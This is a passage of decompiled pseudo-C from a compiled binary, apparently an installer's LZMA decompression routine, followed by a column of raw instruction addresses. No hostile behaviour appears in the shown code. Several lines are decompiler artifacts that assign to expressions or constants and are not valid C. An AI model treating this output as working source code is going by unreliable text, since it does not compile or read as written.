											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__ebx = __edx + 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__ebx = __edx + 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                                      0x00406d0f
                                                                      0x00406d0f
                                                                      0x00406d0f
                                                                      0x00406d0f
                                                                      0x00406d15
                                                                      0x00406d19
                                                                      0x00406d1d
                                                                      0x00406d27
                                                                      0x00406d35
                                                                      0x0040700b
                                                                      0x0040700b
                                                                      0x0040700e
                                                                      0x00407015
                                                                      0x00407042
                                                                      0x00407042
                                                                      0x00407046
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00407048
                                                                      0x00407051
                                                                      0x00407057
                                                                      0x0040705a
                                                                      0x0040705d
                                                                      0x00407060
                                                                      0x00407063
                                                                      0x00407069
                                                                      0x00407082
                                                                      0x00407085
                                                                      0x00407091
                                                                      0x00407092
                                                                      0x00407095
                                                                      0x0040706b
                                                                      0x0040706b
                                                                      0x0040707a
                                                                      0x0040707d
                                                                      0x0040707d
                                                                      0x0040709f
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x00407042
                                                                      0x00407046
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070a1
                                                                      0x004070a1
                                                                      0x0040701a
                                                                      0x0040701e
                                                                      0x00407156
                                                                      0x00407156
                                                                      0x00407160
                                                                      0x00407168
                                                                      0x0040716f
                                                                      0x00407171
                                                                      0x00407178
                                                                      0x0040717c
                                                                      0x0040717c
                                                                      0x00407024
                                                                      0x0040702a
                                                                      0x00407031
                                                                      0x00407039
                                                                      0x00407039
                                                                      0x0040703c
                                                                      0x00000000
                                                                      0x0040703c
                                                                      0x004070a6
                                                                      0x004070b3
                                                                      0x004070b6
                                                                      0x00406fc2
                                                                      0x00406fc2
                                                                      0x00406fc2
                                                                      0x0040675e
                                                                      0x0040675e
                                                                      0x0040675e
                                                                      0x00406767
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040676d
                                                                      0x0040676d
                                                                      0x00000000
                                                                      0x00406774
                                                                      0x00406778
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040677e
                                                                      0x00406781
                                                                      0x00406784
                                                                      0x00406787
                                                                      0x0040678b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406791
                                                                      0x00406791
                                                                      0x00406794
                                                                      0x00406796
                                                                      0x00406797
                                                                      0x0040679a
                                                                      0x0040679c
                                                                      0x0040679d
                                                                      0x0040679f
                                                                      0x004067a2
                                                                      0x004067a7
                                                                      0x004067ac
                                                                      0x004067b5
                                                                      0x004067c8
                                                                      0x004067cb
                                                                      0x004067d7
                                                                      0x004067ff
                                                                      0x00406801
                                                                      0x0040680f
                                                                      0x0040680f
                                                                      0x00406813
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406803
                                                                      0x00406803
                                                                      0x00406806
                                                                      0x00406807
                                                                      0x00406807
                                                                      0x00000000
                                                                      0x00406803
                                                                      0x004067d9
                                                                      0x004067dd
                                                                      0x004067e2
                                                                      0x004067e2
                                                                      0x004067eb
                                                                      0x004067f3
                                                                      0x004067f6
                                                                      0x00000000
                                                                      0x004067fc
                                                                      0x004067fc
                                                                      0x00000000
